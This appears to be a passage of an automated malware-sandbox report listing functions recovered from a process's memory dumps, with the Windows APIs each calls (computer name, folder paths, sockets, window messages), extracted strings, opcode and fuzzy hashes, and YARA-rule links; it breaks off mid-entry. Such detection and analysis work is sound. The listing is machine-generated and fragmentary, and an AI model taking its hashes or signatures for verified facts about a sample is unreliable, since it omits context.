API String ID: 3660427363-0
Opcode ID: 9df582ab51bfa9669040968c25301e8e3c1d4383839c5fbb6343ce1e7bb2f653
Instruction ID: 8a4b65cb60e29071cb2689948b15cfa458c1546b99e80e7300514f3859299455
Opcode Fuzzy Hash: 9df582ab51bfa9669040968c25301e8e3c1d4383839c5fbb6343ce1e7bb2f653
Instruction Fuzzy Hash: B4016271900601ABD310DF16DC86B26FBB4FB88B20F14815AED085B745D275F525CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 004C05FE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 004C064E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: bdd04f75bf2ad02f2deb881f6360263d435c99d5d617f2cf4d104d1b44c3d51e
Instruction ID: 79d86b60f9850c2bd10f40db714ef52fe7b20d8c293a7b0d9894511bafe20ef3
Opcode Fuzzy Hash: bdd04f75bf2ad02f2deb881f6360263d435c99d5d617f2cf4d104d1b44c3d51e
Instruction Fuzzy Hash: 6B016271900601ABD310DF16DC86F26FBB4FB88B20F14815AED085B745D275F525CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0015AF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000E40,?,?), ref: 0015AFEA

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: d5838a9aad4a39383587d0988442d898521ecc6ac248abd59d3543dd4c3a2b1b
Instruction ID: 50ce86faa380d46ad98e8e53fbd716317c0c0c5c5ef8c641f2e81c2510aa6ddb
Opcode Fuzzy Hash: d5838a9aad4a39383587d0988442d898521ecc6ac248abd59d3543dd4c3a2b1b
Instruction Fuzzy Hash: A6016271900601ABD310DF16DC86B26FBB4FB88A20F148159ED085B745D275F515CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0015BB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0015BBB9

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 11743aac6478947918a7219538d0ceade45187b028ca006ed9d620d8173e17d8
Instruction ID: 990b7bde04df8adacb2b0462211145d0b080a6ecff3773f76c94a9fed081c726
Opcode Fuzzy Hash: 11743aac6478947918a7219538d0ceade45187b028ca006ed9d620d8173e17d8
Instruction Fuzzy Hash: 8A01DF36504700DFEB208F16DC85B65FBA0EF14321F08C0AEDD4A8B626D3B1E818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0015BAD6, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0015BB0B

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d805c15e715d9d5ac1e5249871ca7ed8d9bdfc76ff2c5bb0e7d98f91b108bedf
Instruction ID: 237a9fdff5ada6569ca9c329ef6112de491096c9443984367de71cb477036408
Opcode Fuzzy Hash: d805c15e715d9d5ac1e5249871ca7ed8d9bdfc76ff2c5bb0e7d98f91b108bedf
Instruction Fuzzy Hash: 8901AD35604744CBEB208F15DCC5761FBA4EF04721F08C0AADD5A8F656D3B5E818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0015A78A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0015A7BC

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: e570987041690a6472d0c734ee5b27e4124d93a7bb05c84c0aacc42a0b8365dc
Instruction ID: c923ffccb953aadfa4d643f818eac5a090d97cc0b251234abbc114b28a4860a4
Opcode Fuzzy Hash: e570987041690a6472d0c734ee5b27e4124d93a7bb05c84c0aacc42a0b8365dc
Instruction Fuzzy Hash: A201AD75400344DFEB10CF15D885761FBE4EF08321F48C5AADD188F606D376A408CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0015B806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0015B841

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 082209f8bf9db8b6f3f87944086443a10e49d30fb390c81fdca6261d969e9362
Instruction ID: cec672086e8d49da76d25d6901a919bb34ea50f0918d5486d60c63426b491a1b
Opcode Fuzzy Hash: 082209f8bf9db8b6f3f87944086443a10e49d30fb390c81fdca6261d969e9362
Instruction Fuzzy Hash: 9301AD31404744DFEB20CF56DC85B61FBA4EF18721F08C09ADD490B626D371A418DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0015B4AE, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 0015B4E3

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: dd07691d0cd93af680236c766dc7b56de6b663057e51b1476f8e9567d0d9a9bd
Instruction ID: 6b43009fa9c257a17cee9a5dd2b2cf06c1665bdf7a601f7993ade943c16a432f
Opcode Fuzzy Hash: dd07691d0cd93af680236c766dc7b56de6b663057e51b1476f8e9567d0d9a9bd
Instruction Fuzzy Hash: FD01DC31404704CFEB20CF05D889B21FBA0EF04722F08C09ADD494F212D371A818DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0015BE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 0015BE70

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 284e73ddd2aa8268761902aac1ad50572a5c6314f88c55f1b2bb9d4c59c0ad6a
Instruction ID: 3c9cebf6cc14949b252ff6ef3ce08ca656ee324e97e27322aab30f1104dd6979
Opcode Fuzzy Hash: 284e73ddd2aa8268761902aac1ad50572a5c6314f88c55f1b2bb9d4c59c0ad6a
Instruction Fuzzy Hash: DDF0C235908744DFEB20CF05D8C67A1FBA0EF04722F18C0AADE094F316D375A808DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0015A372, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0015A3A4

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 284e73ddd2aa8268761902aac1ad50572a5c6314f88c55f1b2bb9d4c59c0ad6a
Instruction ID: be34e0812862298f57913d20ce97b98e4dd28e97182b0142bec1421704870741
Opcode Fuzzy Hash: 284e73ddd2aa8268761902aac1ad50572a5c6314f88c55f1b2bb9d4c59c0ad6a
Instruction Fuzzy Hash: 53F0DC34440744DFEB208F06D884725FBA0EF04326F58C19ADD084F602D775A808CA63

Uniqueness

Uniqueness Score: -1.00%

Function 0015A4B6, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0015A4E5

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 152da3a1ed7b48640d684ac72f4429811391db202a0723c93d76e33ccc83292b
Instruction ID: a3b3c19067dc39cc5ea84d9e556d86be34c2ddca14336202de91b46f25c61b24
Opcode Fuzzy Hash: 152da3a1ed7b48640d684ac72f4429811391db202a0723c93d76e33ccc83292b
Instruction Fuzzy Hash: BDF0AF31540740CFEB20CF05D889B61FBA0EF05722F48C19ADD194F316E3B5A948DAA3

Uniqueness

Uniqueness Score: -1.00%

Function 003F2148, Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

r*+, xrefs: 003F2387

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 31c13c4f2af3aba204ed68233b2267259e31cf97e839622ac3f15664b5a607f0
Instruction ID: 86d4edc086c83bf851d9b30a848d6ee81b26ad8a7d8a083c7a4f6d78c9b22a25
Opcode Fuzzy Hash: 31c13c4f2af3aba204ed68233b2267259e31cf97e839622ac3f15664b5a607f0
Instruction Fuzzy Hash: 14719D30A0820DDFCB46DFA4C8816BFBBB5FF85300F2084AAD6169B6A5D7349941DF52

Uniqueness

Uniqueness Score: -1.00%

Function 003F02E8, Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

:@lq, xrefs: 003F0537

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: :@lq
API String ID: 0-537014040
Opcode ID: 64fceb130f3abd35e4f3ad9e44a6312a6010b233555de5944623b5d7120c8eea
Instruction ID: a024c257e4e1e118b04987ba17b4624bfdf0a63412693656c3e36b4e57997304
Opcode Fuzzy Hash: 64fceb130f3abd35e4f3ad9e44a6312a6010b233555de5944623b5d7120c8eea
Instruction Fuzzy Hash: 2951B334B05209CFDB0ADF28C55476D7BF2EF8A310F248469D60AAB7A2DB359C05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003F8F78, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 003F908F

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: c10d65a28c8877ddd4d77af607c965007094e8da5817057c35f373169ecc754b
Instruction ID: 8ca7d94f1c56c8c904be62922abafb263a7159e2f2738a0ead0699e86efe9abb
Opcode Fuzzy Hash: c10d65a28c8877ddd4d77af607c965007094e8da5817057c35f373169ecc754b
Instruction Fuzzy Hash: DD413930E0420EDFCB09DFA5C5457BEBBB5FB88304F20806AD502AB661DB354A40DF56

Uniqueness

Uniqueness Score: -1.00%

Function 02151B01, Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

Mq^, xrefs: 02151BC7, 02151BCC

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID: Mq^
API String ID: 0-3824063146
Opcode ID: f5f327052f8c1701050fa737e366d1656bd13562ad16cd3614057566fe4aa0e2
Instruction ID: 5b1cb2a409f5ced066cd9b63f3c9e18323230ede772b3cba28548a80d88bcfe2
Opcode Fuzzy Hash: f5f327052f8c1701050fa737e366d1656bd13562ad16cd3614057566fe4aa0e2
Instruction Fuzzy Hash: 4021D831684624DBC71A8B7888407FEB7F6AF88351F1545B9DC6ED7240EB318D45C791

Uniqueness

Uniqueness Score: -1.00%

Function 003FB4A1, Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

$,|, xrefs: 003FB564

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: $,|
API String ID: 0-2693226903
Opcode ID: fc9a7292265fecc1f8c18ea35e142013ce3f59bd816590860203432896d51076
Instruction ID: df998ce30cb5a0427baf87551146d7c076806fde4b205c8b17b2e92ff125757e
Opcode Fuzzy Hash: fc9a7292265fecc1f8c18ea35e142013ce3f59bd816590860203432896d51076
Instruction Fuzzy Hash: 1C316770B00204DFC719EB78E858A7D77BAABC6311324847EE40A9B3A9DF389D019B41

Uniqueness

Uniqueness Score: -1.00%

Function 003FCFA8, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

H>|, xrefs: 003FCF65

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: H>|
API String ID: 0-2579374848
Opcode ID: def7700ffbceae277fc6b7be79b51cf554bdd91d0ecd2ae60be769b88eaacce8
Instruction ID: 74ccc03974361c49ea567e61a6a0071e857a69667e762227908c7c490f295d26
Opcode Fuzzy Hash: def7700ffbceae277fc6b7be79b51cf554bdd91d0ecd2ae60be769b88eaacce8
Instruction Fuzzy Hash: 8921F232318308DBC705A67CA944A79779BABC6320764897EE11ADF6E5CE358C079392

Uniqueness

Uniqueness Score: -1.00%

Function 003FBA1E, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_qq, xrefs: 003FBB01

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: _qq
API String ID: 0-943677416
Opcode ID: c89e8b0b6d6deb713fb43b7b51051736dc8ff61b0ec34ea0a7b0fecbeaff75e7
Instruction ID: 6a333aa63d9afa59b07411efba95f90ee975113972828c3e49643fa12952155c
Opcode Fuzzy Hash: c89e8b0b6d6deb713fb43b7b51051736dc8ff61b0ec34ea0a7b0fecbeaff75e7
Instruction Fuzzy Hash: 4A31AA70A0030ACBEB10EF65C840B6AFBF2BF85304F55C12DD4159B26ADB78888ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 003F2656, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_qq, xrefs: 003F2739

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: _qq
API String ID: 0-943677416
Opcode ID: 36ca5d6496d51f77c666de058cf148ccc04a02999c3f47bb8437d52b6cc407f6
Instruction ID: fdd7bbdb31c34b67a67c3c102f20da2b8369316e805a3086381d5cf872c47726
Opcode Fuzzy Hash: 36ca5d6496d51f77c666de058cf148ccc04a02999c3f47bb8437d52b6cc407f6
Instruction Fuzzy Hash: E231AB30A0030ACBDB15DF66D9503AAFBF2BF85308F25C66DC4169B265DBB49989CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003F935E, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_qq, xrefs: 003F9441

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: _qq
API String ID: 0-943677416
Opcode ID: 528c1bf8c2feec44494cc470b761530e4c436742232557de9ae9c9caef988c0c
Instruction ID: a5c258a0d272c17020da3f95a5c34efe2d219d8bf1e087b0a1a5eca94da6d512
Opcode Fuzzy Hash: 528c1bf8c2feec44494cc470b761530e4c436742232557de9ae9c9caef988c0c
Instruction Fuzzy Hash: BD31AC30E1074ECBE710DF26C88476AB7B6BF89314F56C52AC0159F2A9CB748889DF41

Uniqueness

Uniqueness Score: -1.00%

Function 004C0FA0, Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004C100C

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e062a943530149866b65074139589c99c0ff5dc9dd94ee53f5a674467c705c93
Instruction ID: 858c43867387210c58828a1f007984eb2f7a019baa774bfa2faec41cf5d64478
Opcode Fuzzy Hash: e062a943530149866b65074139589c99c0ff5dc9dd94ee53f5a674467c705c93
Instruction Fuzzy Hash: 2621A1765093C09FDB12CB25DC95B92BFB4AF17324F0980DBE8858F663D2659908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C01F4, Relevance: 1.3, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004C0264

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5dbaaae65f75596e55f79746d3ab57f66e75681bae151658bf0362ed6bac84c7
Instruction ID: 1d6858b8919ab4dbb92f681af0d53041e3a6910315371fa25dd096160e9d84ef
Opcode Fuzzy Hash: 5dbaaae65f75596e55f79746d3ab57f66e75681bae151658bf0362ed6bac84c7
Instruction Fuzzy Hash: F421D5B59053849FD712CF54DD89B92BFA8EF42324F0984EBED849B653D3349805CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003F8670, Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

5N, xrefs: 003F8688

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: 5N
API String ID: 0-4099486163
Opcode ID: e8169e4747c11820380b13ea6c32946603d9f7ff1f1fe087de13d432291e9c74
Instruction ID: 84bd0bcdd5b52a73dbb623fbf3e6038d605a20fb1eabc520a5a6e06af31c8d93
Opcode Fuzzy Hash: e8169e4747c11820380b13ea6c32946603d9f7ff1f1fe087de13d432291e9c74
Instruction Fuzzy Hash: 510126327043C5DFC3165B358454025BBA5AFC2305328857EE24ACB651DFB49C04C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 003FE3F8, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

<H|, xrefs: 003FE41F

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: <H|
API String ID: 0-3005431292
Opcode ID: 02c6a2a20529040195efa46c613fba9fe6b915f2430a450c0b6528ced3f951c0
Instruction ID: b0689c055e008d8fdedebf769ea56531daea2ca0aa233f568a3cf0c5e831e2c0
Opcode Fuzzy Hash: 02c6a2a20529040195efa46c613fba9fe6b915f2430a450c0b6528ced3f951c0
Instruction Fuzzy Hash: 6901A231300308EBC701BB75EC14A6973EAAF86361764807DEA068B678EF359C069795

Uniqueness

Uniqueness Score: -1.00%

Function 004C0232, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004C0264

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8cda44f82c8af26efe919c09271461299f666376374d65c521cc5fb14efedb25
Instruction ID: ab4c087a71f6dc76392423d1c00082024b38857e2e219db9cb35e1c5656a8dbb
Opcode Fuzzy Hash: 8cda44f82c8af26efe919c09271461299f666376374d65c521cc5fb14efedb25
Instruction Fuzzy Hash: 8601DF79500300DFEB50CF25DC89BA6FBA4EF40320F08C4ABDC098B642D679E804DA62

Uniqueness

Uniqueness Score: -1.00%

Function 004C0FDA, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004C100C

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b2e2922809aa632f4e8cdc91b5231a7f6d1780cf97918738e958d7681f03d891
Instruction ID: 57fe9cfd85fefeadc7d6c0d45b7b619d660d00a48f7776771e5a461bdf79262d
Opcode Fuzzy Hash: b2e2922809aa632f4e8cdc91b5231a7f6d1780cf97918738e958d7681f03d891
Instruction Fuzzy Hash: 7701D475500740CBDB50CF16DC85B52FBE4EF01321F04C0ABDC098BA52D679E854CB62

Uniqueness

Uniqueness Score: -1.00%

Function 003F8E60, Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

XPN, xrefs: 003F8E67

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: XPN
API String ID: 0-3056703449
Opcode ID: 003cef55fcd95a6859822710108bf7b9cce7a9a160c6f6014d78d15ab872e3ba
Instruction ID: a58c0a9bf0a7c5405dd1413ba4eeb61b224c5a03c5ae7cf62788e5d39195d556
Opcode Fuzzy Hash: 003cef55fcd95a6859822710108bf7b9cce7a9a160c6f6014d78d15ab872e3ba
Instruction Fuzzy Hash: 3CF0AD32304648CB8208A729D81027D37D7ABCA366364893EE60ACF291CF329C069746

Uniqueness

Uniqueness Score: -1.00%

Function 003FE408, Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

<H|, xrefs: 003FE41F

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: <H|
API String ID: 0-3005431292
Opcode ID: 626338e4e404334e8b16bee3817995390830772a0ddf15f61878716e3f3df7b9
Instruction ID: a1a8e14e0abbed3d4e4676741e1917e79950eb8e6fb460a3d8c4f42d05fe7598
Opcode Fuzzy Hash: 626338e4e404334e8b16bee3817995390830772a0ddf15f61878716e3f3df7b9
Instruction Fuzzy Hash: A3F0A431300308EBC701BB75E81892973EAAFC6351364803DE606CB678DF359C059795

Uniqueness

Uniqueness Score: -1.00%

Function 003F8858, Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

5N, xrefs: 003F886F

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: 5N
API String ID: 0-4099486163
Opcode ID: 4bc38729e870c1f91329d58a003b5b9422523e71a28543b7fc4cba48e4236170
Instruction ID: 113c8a770a00dd34d602e1a70983b04c0b68896b35c3dd749873bacef1c22252
Opcode Fuzzy Hash: 4bc38729e870c1f91329d58a003b5b9422523e71a28543b7fc4cba48e4236170
Instruction Fuzzy Hash: 0FF0F672705344AFC30AA73898105797BEA9BC335536884BEE24ACF392CF359D068391

Uniqueness

Uniqueness Score: -1.00%

Function 02153470, Relevance: 1.3, Strings: 1, Instructions: 5COMMON

Download Yara Rule

Strings

MOC, xrefs: 0215370E

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID: MOC
API String ID: 0-624257665
Opcode ID: c7ec422dda365564ea30052a1aef959ed6b9fdded5a44e9fa3e10434e64afeec
Instruction ID: 83bff092ecee1cc3995700d3773d833bebc0a85a2c6a2ae7f3e27101b9f0fb42
Opcode Fuzzy Hash: c7ec422dda365564ea30052a1aef959ed6b9fdded5a44e9fa3e10434e64afeec
Instruction Fuzzy Hash: 38A002345A17118FC3430E70C0451D033E0EE4663431100A88D508F024D27D184B9B21

Uniqueness

Uniqueness Score: -1.00%

Function 003F12E8, Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93364a5913ac44510dea2cbe0637408335e36de03054ae81b047ed0a2cf449cb
Instruction ID: 99e07760c6fab90a78ef24d2ec8e6beb15676b7ad4cae6fcc2bd7886bfa546f1
Opcode Fuzzy Hash: 93364a5913ac44510dea2cbe0637408335e36de03054ae81b047ed0a2cf449cb
Instruction Fuzzy Hash: B922F735A0060ACFC725DF24D480A6AF7F6FF49310B24C5AAD85A9B75ADB30AD45CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003F5E50, Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5283160547dd1b0e4fc2b66e996a23358e78d702a581f8bcf7a858a19a804ff
Instruction ID: a4e0da457463b28dbcc9c1009c92e9f72c20acc6597d4d091d09b34299a840d6
Opcode Fuzzy Hash: b5283160547dd1b0e4fc2b66e996a23358e78d702a581f8bcf7a858a19a804ff
Instruction Fuzzy Hash: A3913F31900A1ACBCF15DF65C8905E9F3B1FF95300F11CA99D94A7B615EB71AA86CF80

Uniqueness

Uniqueness Score: -1.00%

Function 003FF661, Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2fa38ab05cd97fdc8019c126f4558bbf9c74543e1044c44c288a06819dddc9c
Instruction ID: c8599a5c845cd5c466bc4745f66f0eeef169087b26ae02523c1af8ab046dae9d
Opcode Fuzzy Hash: d2fa38ab05cd97fdc8019c126f4558bbf9c74543e1044c44c288a06819dddc9c
Instruction Fuzzy Hash: AF71E0312047198FD716CF18C880A6AB7E6FF85354F1684BADA4ACB662D770EC45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 021520E0, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df65cdff10933c015332dda5d5e7882ce620ed32e4ac692d9c994f41aedc86fd
Instruction ID: 1f234246ca4a49e0ad3af8de54aa8ea8970cda889e40031cdd34ed71515b4a71
Opcode Fuzzy Hash: df65cdff10933c015332dda5d5e7882ce620ed32e4ac692d9c994f41aedc86fd
Instruction Fuzzy Hash: 4C714C35A40214DFDB18CF64C884BAEBBF1BF48314F1985A9DD26A7761C771E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003F4FE8, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0f44c76b433971dbcb5c9aaf7d36d7648f95218b170b4eb072ef3775a97e9a
Instruction ID: c943b7208ee3992cdb2cb10b6e2f3f3780371ce0c7ba9d0ecc0f1e4314f9d6f6
Opcode Fuzzy Hash: ce0f44c76b433971dbcb5c9aaf7d36d7648f95218b170b4eb072ef3775a97e9a
Instruction Fuzzy Hash: 0361143160460ECFCB02EF68D490A7E7BF6AFC6340B64C566D6068B65ADB30AC41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 003F09A5, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e0a2fd2a1f015331f9e53f65459428adf4ebe3f8ce7281b4a53d744db4b6378
Instruction ID: d563fd4b0fbb7e57f690b43a6e2df0874ae9d40f68936de6df80d1bbca68433b
Opcode Fuzzy Hash: 2e0a2fd2a1f015331f9e53f65459428adf4ebe3f8ce7281b4a53d744db4b6378
Instruction Fuzzy Hash: AF510731B0430ADFCB19AB78C8506BEB7B6FF85304F208569E5569B655DB30EC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 021540C0, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f068b8e17019b9cdf4d3da1cd865ec61f36112f22104b1c7967b88d25b6bc278
Instruction ID: c56263f879436a63aa0734fc750a6a1c2b5432ec8dec87d32b6c1cdbc2e3c48c
Opcode Fuzzy Hash: f068b8e17019b9cdf4d3da1cd865ec61f36112f22104b1c7967b88d25b6bc278
Instruction Fuzzy Hash: E751C431A00629DFCB05EFA8D4D04AEF7B2FF85310715C696D869AB216DB30F991CB91

Uniqueness

Uniqueness Score: -1.00%

Function 021538D0, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ba12f97e55cb79c60962c289f6518eed63a440a1662e3a6a084edc982ffa44
Instruction ID: 0a1829e38f9aa2eeebb5383f3ee36e2c182edbd94e10836c1c204aa12696ec6a
Opcode Fuzzy Hash: 19ba12f97e55cb79c60962c289f6518eed63a440a1662e3a6a084edc982ffa44
